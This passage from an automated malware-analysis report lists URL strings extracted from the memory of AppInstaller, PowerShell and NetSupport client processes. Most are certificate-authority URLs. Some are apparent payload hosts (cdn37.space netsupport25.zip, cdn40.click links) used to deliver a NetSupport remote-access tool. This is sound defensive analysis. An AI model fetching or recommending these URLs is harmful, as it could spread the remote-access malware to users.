                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, TCCTL32.DLL.26.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
                                    Source: AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org0
                                    Source: AppInstaller.exe, 0000000E.00000002.1775680653.00000196D5F93000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679968743.00000196D5F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                                    Source: AppInstaller.exe, 0000000E.00000002.1775680653.00000196D5F93000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679968743.00000196D5F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                                    Source: AppInstaller.exe, 0000000E.00000002.1775680653.00000196D5F93000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679968743.00000196D5F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                                    Source: AppInstaller.exe, 0000000E.00000002.1775680653.00000196D5F93000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679968743.00000196D5F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
                                    Source: AppInstaller.exe, 0000000E.00000002.1776317770.00000196D6200000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ancert.com/cps0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es
                                    Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/es/address-direccion.html
                                    Source: powershell.exe, 00000017.00000002.2180463385.000001E11E621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                    Source: powershell.exe, 00000019.00000002.1941634656.000002B2801BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html8
                                    Source: AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
                                    Source: AppInstaller.exe, 0000000E.00000003.1680507889.00000196D5F68000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680617833.00000196D5F42000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
                                    Source: AppInstaller.exe, 0000000E.00000002.1766321527.00000196D5140000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.correo.com.uy/correocert/cps.pdf0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr, TCCTL32.DLL.26.drString found in binary or memory: http://www.crossteccorp.com
                                    Source: AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1775764927.00000196D5FA9000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679946512.00000196D5F7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-int0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-std0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.defence.gov.au/pki0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1775764927.00000196D5FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1775764927.00000196D5FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca0f
                                    Source: AppInstaller.exe, 0000000E.00000003.1679991500.00000196D5F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
                                    Source: AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ecee.gov.pt/dpc0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.eme.lv/repository0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.drString found in binary or memory: http://www.globalsign.net/repository/0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.drString found in binary or memory: http://www.globalsign.net/repository09
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0=
                                    Source: AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
                                    Source: client32.exe, 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                    Source: client32.exe, 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.drString found in binary or memory: http://www.netsupportsoftware.com
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oaticerts.com/repository.
                                    Source: client32.exe, 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.drString found in binary or memory: http://www.pci.co.uk/support
                                    Source: client32.exe, 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                    Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
                                    Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
                                    Source: AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680507889.00000196D5F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
                                    Source: AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rcsc.lt/repository0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/cps/0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
                                    Source: AppInstaller.exe, 0000000E.00000002.1776167790.00000196D5FE2000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssc.lt/cps03
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/dpc0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/lcr0#
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.drString found in binary or memory: http://www.symauth.com/cps0(
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.drString found in binary or memory: http://www.symauth.com/rpa00
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
                                    Source: AppInstaller.exe, 0000000E.00000003.1680507889.00000196D5F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
                                    Source: AppInstaller.exe, 00000024.00000002.2594809898.000002A99F399000.00000004.00000020.00020000.00000000.sdmp, AppInstallerFullTrustAppServiceClient.exe, 00000026.00000002.2102011848.00000177F3C7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
                                    Source: AppInstaller.exe, 0000000E.00000002.1766321527.00000196D5140000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp41
                                    Source: AppInstallerFullTrustAppServiceClient.exe, 00000012.00000002.1677556637.000002B5AB27A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppP
                                    Source: powershell.exe, 00000029.00000002.2535977313.000002678C620000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                                    Source: powershell.exe, 00000017.00000002.2180463385.000001E11D001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1941634656.000002B280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023161161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2535977313.000002678C66C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023161D6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.000002316227F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162258000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1967121818.000002315F2F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316227F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp(
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp8
                                    Source: AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5300000.00000004.00000020.00020000.00000000.sdmp, AppInstallerFullTrustAppServiceClient.exe, 00000012.00000002.1677556637.000002B5AB27A000.00000004.00000020.00020000.00000000.sdmp, AppInstallerFullTrustAppServiceClient.exe, 00000012.00000002.1677515600.000002B5AB261000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2594809898.000002A99F3F2000.00000004.00000020.00020000.00000000.sdmp, AppInstallerFullTrustAppServiceClient.exe, 00000026.00000002.2102011848.00000177F3C8C000.00000004.00000020.00020000.00000000.sdmp, AppInstallerFullTrustAppServiceClient.exe, 00000026.00000002.2100907317.00000177F3C62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                                    Source: AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS80
                                    Source: AppInstallerFullTrustAppServiceClient.exe, 00000026.00000002.2102011848.00000177F3C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSClass
                                    Source: AppInstallerFullTrustAppServiceClient.exe, 00000012.00000002.1677515600.000002B5AB261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSPM
                                    Source: AppInstallerFullTrustAppServiceClient.exe, 00000026.00000002.2100907317.00000177F3C62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSapplication/msixbundleasimovrome.telemetryi
                                    Source: AppInstaller.exe, 00000024.00000002.2594809898.000002A99F3F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSbl
                                    Source: chromecache_146.1.drString found in binary or memory: https://api.ipify.org?format=json
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn37.space.0.0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023161659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn37.space/974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshd
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023161650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn37.space/files/netsupport25.zip
                                    Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn40.click
                                    Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn40.click/223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn40.click/73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61
                                    Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn40.click/73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?fmtKxA
                                    Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn40.click/974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4
                                    Source: chromecache_146.1.drString found in binary or memory: https://cdn40.click/9e4e27b7-bcfb-4298-bf8f-2cf4a6bdb3bf-9b6b40d6-3f8e-4755-9063-562658ebdb95
                                    Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn40.click/bb9c1a14-4e3d-40ab-bcc8-0b84e78255b0-4bed9ff2-0f4e-48fb-92ed-1065fcd85e01
                                    Source: powershell.exe, 0000001A.00000002.2149775477.00000231711D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                    Source: powershell.exe, 0000001A.00000002.2149775477.00000231711D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                    Source: powershell.exe, 0000001A.00000002.2149775477.00000231711D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                    Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.drString found in binary or memory: https://d.symcb.com/cps0%
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.drString found in binary or memory: https://d.symcb.com/rpa0
                                    Source: powershell.exe, 00000019.00000002.1941634656.000002B2801BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                    Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester8
                                    Source: powershell.exe, 00000017.00000002.2180463385.000001E11E1A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1941634656.000002B2814AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2535977313.000002678CC32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                                    Source: AppInstaller.exe, 0000000E.00000003.1690225713.00000196D59C8000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1694980372.00000196D5C45000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1696809126.00000196D5C48000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1695283306.00000196D5A8C000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1695365533.00000196D5B19000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1682881043.00000196D5A8B000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1695210802.00000196D59CE000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1684574291.00000196D5997000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1772231898.00000196D5B22000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1683185279.00000196D5B18000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 